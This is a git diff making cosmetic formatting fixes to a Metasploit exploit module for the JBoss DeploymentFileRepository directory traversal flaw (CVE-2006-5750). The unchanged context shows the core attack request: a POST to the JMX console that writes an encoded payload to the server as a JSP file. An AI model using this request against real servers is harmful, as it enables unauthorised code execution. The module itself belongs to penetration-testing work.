diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 5525bfd066..5e34e6e1d9 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -17,18 +21,18 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'JBoss Java Class DeploymentFileRepository Directory Traversal', 'Description' => %q{ - This module exploits a directory traversal vulnerability in the DeploymentFileRepository + This module exploits a directory traversal vulnerability in the DeploymentFileRepository class in JBoss Application Server (jbossas) 3.2.4 through 4.0.5. This vulnerability - allows remote authenticated (and unathenticated) users to read or modify arbitrary files, and possibly execute - arbitrary code. + allows remote authenticated (and unathenticated) users to read or modify arbitrary files, + and possibly execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5750' ], - [ 'BID', '21219' ], + [ 'BID', '21219' ] ], 'Privileged' => false, 'Platform' => [ 'linux' ], @@ -39,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_JAVA, 'Payload' => { - 'DisableNops' => true, + 'DisableNops' => true, }, } ], @@ -65,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/jmx-console/HtmlAdaptor', 'method' => 'POST', 'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' + - Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' + + Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' + Rex::Text.uri_encode(payload.encoded) + '&arg4=True', })